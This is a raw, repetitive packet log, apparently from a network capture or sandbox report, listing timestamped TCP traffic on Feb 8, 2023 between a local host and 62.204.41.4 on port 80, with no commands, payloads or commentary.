                            Feb 8, 2023 17:38:19.660037994 CET804987762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:19.660252094 CET4987780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:19.665966988 CET804987862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:19.666152954 CET4987880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:19.667671919 CET4987880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:19.730078936 CET804987862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:19.732453108 CET804987862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:19.732601881 CET4987880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:19.848592043 CET4987880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:19.849667072 CET4987980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:19.911128044 CET804987962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:19.911163092 CET804987862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:19.911372900 CET4987880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:19.911855936 CET4987980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:19.911855936 CET4987980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:19.973294020 CET804987962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:19.976509094 CET804987962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:19.980197906 CET4987980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.098789930 CET4987980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.099766016 CET4988080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.160514116 CET804987962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.162556887 CET804988062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.162744045 CET4987980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.162791967 CET4988080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.163284063 CET4988080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.225650072 CET804988062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.230844021 CET804988062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.231079102 CET4988080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.348247051 CET4988080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.349138975 CET4988180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.410870075 CET804988062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.411463022 CET4988080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.411592007 CET804988162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.411700964 CET4988180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.412226915 CET4988180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.474579096 CET804988162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.477679968 CET804988162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.480000019 CET4988180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.583314896 CET4988180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.584619045 CET4988280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.645095110 CET804988262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.645793915 CET804988162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.645981073 CET4988180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.646684885 CET4988280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.650207996 CET4988280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.711039066 CET804988262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.713953972 CET804988262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.714759111 CET4988280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.819437981 CET4988280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.820435047 CET4988380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.880161047 CET804988262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.880392075 CET4988280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.883383036 CET804988362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.883584976 CET4988380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.884072065 CET4988380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:20.946614981 CET804988362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.950083017 CET804988362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:20.950277090 CET4988380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.067610979 CET4988380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.069569111 CET4988480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.130634069 CET804988362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:21.130846024 CET4988380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.133191109 CET804988462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:21.133447886 CET4988480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.133805990 CET4988480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.196429014 CET804988462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:21.201188087 CET804988462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:21.201436043 CET4988480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.323889971 CET4988480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.325037956 CET4988580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.384459972 CET804988562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:21.384656906 CET4988580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.385215044 CET4988580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.386512041 CET804988462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:21.386625051 CET4988480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.444365025 CET804988562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:21.446939945 CET804988562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:21.447066069 CET4988580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.550952911 CET4988580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.551850080 CET4988680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.610424995 CET804988562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:21.610676050 CET4988580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:21.611167908 CET804988662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:31.286941051 CET804992562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:31.289877892 CET804992562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:31.289958954 CET4992580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:31.455495119 CET4992580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:31.456527948 CET4992680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:31.517345905 CET804992562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:31.517446995 CET4992580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:31.518785954 CET804992662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:31.518871069 CET4992680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:31.519366026 CET4992680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:31.581804037 CET804992662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:31.584067106 CET804992662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:31.584187031 CET4992680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:31.723419905 CET4992680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:31.724069118 CET4992780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:31.786880016 CET804992762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:31.786920071 CET804992662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:31.787081957 CET4992780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:31.787113905 CET4992680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.329981089 CET4992780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.391801119 CET804992762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:32.395512104 CET804992762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:32.395697117 CET4992780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.621315956 CET4992780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.622225046 CET4992880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.682729006 CET804992862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:32.682925940 CET4992880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.682990074 CET804992762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:32.683082104 CET4992780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.721034050 CET4992880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.781610966 CET804992862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:32.783979893 CET804992862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:32.784164906 CET4992880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.935250998 CET4992880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.937285900 CET4992980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.996412992 CET804992862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:32.996589899 CET4992880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:32.999515057 CET804992962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:33.000267982 CET4992980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:33.000267982 CET4992980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:33.062922955 CET804992962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:33.066776991 CET804992962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:33.066931963 CET4992980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:33.689563990 CET4992980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:33.690257072 CET4993080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:33.750929117 CET804993062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:33.751118898 CET4993080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:33.751358986 CET804992962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:33.751435041 CET4992980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:33.757164955 CET4993080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:33.816972971 CET804993062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:33.818859100 CET804993062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:33.819005966 CET4993080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:33.963834047 CET4993080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:33.964564085 CET4993180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.023832083 CET804993062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.023926020 CET4993080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.029495955 CET804993162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.029719114 CET4993180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.030036926 CET4993180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.093242884 CET804993162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.098907948 CET804993162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.099122047 CET4993180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.460498095 CET4993180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.461209059 CET4993280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.521039009 CET804993262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.521152973 CET4993280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.522912025 CET4993280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.523037910 CET804993162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.523114920 CET4993180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.582596064 CET804993262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.585572958 CET804993262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.585655928 CET4993280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.697350979 CET4993280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.697973013 CET4993380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.757229090 CET804993262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.757319927 CET4993280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.758299112 CET804993362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.758418083 CET4993380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.763684988 CET4993380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.824778080 CET804993362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.827692032 CET804993362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:34.827780008 CET4993380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.943502903 CET4993380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:34.944612026 CET4993480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.004091978 CET804993362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.004339933 CET4993380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.007080078 CET804993462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.007324934 CET4993480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.008002043 CET4993480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.070739985 CET804993462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.074621916 CET804993462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.074714899 CET4993480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.178791046 CET4993480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.180090904 CET4993580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.241609097 CET804993562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.241914988 CET4993580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.242044926 CET804993462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.242146969 CET4993480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.242769003 CET4993580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.304395914 CET804993562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.305485964 CET804993562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.305708885 CET4993580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.418565989 CET4993580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.419605017 CET4993680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.481764078 CET804993562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.481810093 CET804993662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.482058048 CET4993580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.482219934 CET4993680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.483540058 CET4993680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.545573950 CET804993662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.549552917 CET804993662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.549709082 CET4993680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.663647890 CET4993680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.664781094 CET4993780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.726892948 CET804993762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.726948977 CET804993662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.727318048 CET4993680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.728635073 CET4993780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.731318951 CET4993780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.793292999 CET804993762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.794156075 CET804993762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.794411898 CET4993780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.912616968 CET4993780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.913924932 CET4993880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.973479033 CET804993762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.973615885 CET4993780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.976628065 CET804993862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:35.976783991 CET4993880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:35.977194071 CET4993880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.041028023 CET804993862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.045663118 CET804993862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.045849085 CET4993880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.163927078 CET4993880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.164906025 CET4993980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.225200891 CET804993962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.225373030 CET4993980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.225912094 CET4993980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.226046085 CET804993862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.226128101 CET4993880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.286942005 CET804993962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.289037943 CET804993962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.289118052 CET4993980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.400391102 CET4993980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.401324034 CET4994080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.460918903 CET804993962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.461177111 CET4993980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.461652040 CET804994062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.461869955 CET4994080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.464020014 CET4994080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.524384022 CET804994062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.526894093 CET804994062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.526985884 CET4994080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.630297899 CET4994080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.631153107 CET4994180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.690987110 CET804994062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.691178083 CET4994080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.692672014 CET804994162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.692809105 CET4994180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.694907904 CET4994180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.756278038 CET804994162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.759859085 CET804994162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.759963036 CET4994180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.865469933 CET4994180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.866472960 CET4994280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.927009106 CET804994162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.927803040 CET4994180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.929306030 CET804994262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.929472923 CET4994280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.933202028 CET4994280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:36.995770931 CET804994262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.998570919 CET804994262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:36.998657942 CET4994280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.115031958 CET4994280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.115889072 CET4994380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.177692890 CET804994362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.177896023 CET4994380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.178622961 CET804994262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.178735018 CET4994280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.183501005 CET4994380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.243927002 CET804994362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.249094009 CET804994362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.249193907 CET4994380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.368330002 CET4994380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.369134903 CET4994480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.428833961 CET804994362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.429038048 CET4994380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.429709911 CET804994462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.429835081 CET4994480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.430399895 CET4994480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.490847111 CET804994462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.494013071 CET804994462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.494110107 CET4994480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.604435921 CET4994480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.605171919 CET4994580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.665186882 CET804994462.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.665297031 CET4994480192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.667772055 CET804994562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.667903900 CET4994580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.668634892 CET4994580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.731168032 CET804994562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.734601021 CET804994562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.734726906 CET4994580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.849359035 CET4994580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.849968910 CET4994680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.911654949 CET804994662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.911842108 CET804994562.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.911987066 CET4994580192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.915360928 CET4994680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.915360928 CET4994680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:37.977240086 CET804994662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.981039047 CET804994662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:37.981158018 CET4994680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.084932089 CET4994680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.086503029 CET4994780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.146635056 CET804994662.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.146982908 CET804994762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.147102118 CET4994680192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.147151947 CET4994780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.153086901 CET4994780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.214565039 CET804994762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.219619036 CET804994762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.219983101 CET4994780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.337177038 CET4994780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.338011980 CET4994880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.398000002 CET804994762.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.398123026 CET4994780192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.399445057 CET804994862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.399859905 CET4994880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.400423050 CET4994880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.461862087 CET804994862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.465370893 CET804994862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.465540886 CET4994880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.569364071 CET4994880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.570713043 CET4994980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.630903006 CET804994862.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.631059885 CET4994880192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.631951094 CET804994962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.632095098 CET4994980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.632550001 CET4994980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.693901062 CET804994962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.698424101 CET804994962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.698571920 CET4994980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.803318977 CET4994980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.804080009 CET4995080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.863801956 CET804995062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.864193916 CET4995080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.865026951 CET804994962.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.867192030 CET4995080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.867263079 CET4994980192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:38.926877975 CET804995062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.931837082 CET804995062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:38.932135105 CET4995080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.053093910 CET4995080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.053960085 CET4995180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.116405010 CET804995162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.116516113 CET804995062.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.116650105 CET4995180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.116662979 CET4995080192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.117122889 CET4995180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.180376053 CET804995162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.184155941 CET804995162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.184372902 CET4995180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.287169933 CET4995180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.288075924 CET4995280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.348573923 CET804995262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.348793030 CET4995280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.350317001 CET4995280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.350732088 CET804995162.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.350833893 CET4995180192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.410125017 CET804995262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.413841963 CET804995262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.414066076 CET4995280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.523960114 CET4995280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.525290012 CET4995380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.584088087 CET804995262.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.584300995 CET4995280192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.586848021 CET804995362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.587064028 CET4995380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.587593079 CET4995380192.168.2.462.204.41.4
                            Feb 8, 2023 17:38:39.649233103 CET804995362.204.41.4192.168.2.4
                            Feb 8, 2023 17:38:39.652129889 CET804995362.204.41.4192.168.2.4
